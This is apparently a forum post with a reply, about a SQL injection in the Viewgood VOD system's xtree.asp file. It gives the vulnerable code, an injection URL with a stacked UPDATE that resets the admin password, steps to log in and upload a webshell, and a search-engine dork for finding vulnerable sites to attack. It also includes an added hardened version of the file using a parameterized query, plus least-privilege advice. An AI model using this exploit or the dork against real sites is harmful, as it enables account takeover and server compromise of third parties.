Latest: breaking into the 远古 (Viewgood) VOD video-on-demand system template
Vulnerable file: webmedia/common/function/xtree.asp

```asp
<!--#include file="../dbcon.inc.asp" -->
<%
' id comes straight from the query string and is concatenated into the SQL below
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
' result set is serialised as XML
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&amp;") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
<!--#include file="../dbend.inc.asp" -->
```

It is easy to see that the code above contains a SQL injection running with DB privileges.
Injection URL: http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1
Table name: customer
Craft a statement to change admin's pass to fuck:
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'

Log into the backend at http://WWWW.XXXXX.COM/webmedia/admin/default.asp, upload a big webshell directly, and that's it!
Test method: search Google or Baidu for: inurl:webmedia/ and pick any site; it can be broken into.
Official site: http://www.viewgood.com/
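A hardened version of the same file, added here as an example and not the vendor's code: it rejects any id that is not a plain integer, binds it as a query parameter so a stacked ";update ..." can never reach the database, and escapes the XML output. It assumes dbcon.inc.asp opens the ADODB.Connection named con (as the original does) and that ParentID is an integer column.

```asp
<!--#include file="../dbcon.inc.asp" -->
<%
' Example hardened xtree.asp; assumes dbcon.inc.asp opens the ADODB.Connection "con" (not the vendor's code).
Dim sId, iNode_ID, re, cmd, rsData, szSQL, szRetVar

' 1. Accept only a plain decimal integer; IsNumeric() alone would still pass "1e3" or "&H1".
sId = Trim(Request.QueryString("id"))
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(sId) Then
    Response.Status = "400 Bad Request"
    Response.End
End If
iNode_ID = CLng(sId)

' 2. Keep the original admin/non-admin split, but bind the value instead of concatenating it.
If Len(Session("SuperAdmin")) > 0 Or Len(Session("LIVEAdmin")) > 0 Or Len(Session("VODAdmin")) > 0 Then
    szSQL = "SELECT Type_ID, ParentID, TypeName FROM TypeInfo WHERE Type_ID >= 20 AND ParentID = ?"
Else
    szSQL = "SELECT Type_ID, ParentID, TypeName FROM TypeInfo WHERE Type_ID > 20 AND ParentID = ?"
End If
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = con
cmd.CommandType = 1                                                       ' adCmdText
cmd.CommandText = szSQL
cmd.Parameters.Append cmd.CreateParameter("ParentID", 3, 1, , iNode_ID)  ' adInteger, adParamInput
Set rsData = cmd.Execute   ' a bound integer cannot carry a stacked ";update ..." statement
' 3. Escape every XML-significant character on output, not just "&".
Function XmlText(s)
    s = Replace(s & "", "&", "&amp;")
    s = Replace(s, "<", "&lt;")
    XmlText = Replace(s, ">", "&gt;")
End Function
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
Do While Not rsData.EOF
    szRetVar = szRetVar & "<TypeInfo><IDN>" & rsData("Type_ID") & "</IDN>"
    szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
    szRetVar = szRetVar & "<TypeName>" & XmlText(rsData("TypeName")) & "</TypeName></TypeInfo>"
    rsData.MoveNext
Loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.ContentType = "text/xml"
Response.Expires = -1
Response.Write szRetVar
%>
<!--#include file="../dbend.inc.asp" -->
```

The UPDATE on customer in the post only succeeds because the site's database login is allowed to write that table; running the web application under a least-privilege login that can only read TypeInfo is the other half of the fix.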
re: Latest: breaking into the 远古 (Viewgood) VOD video-on-demand system template
I understand how you feel!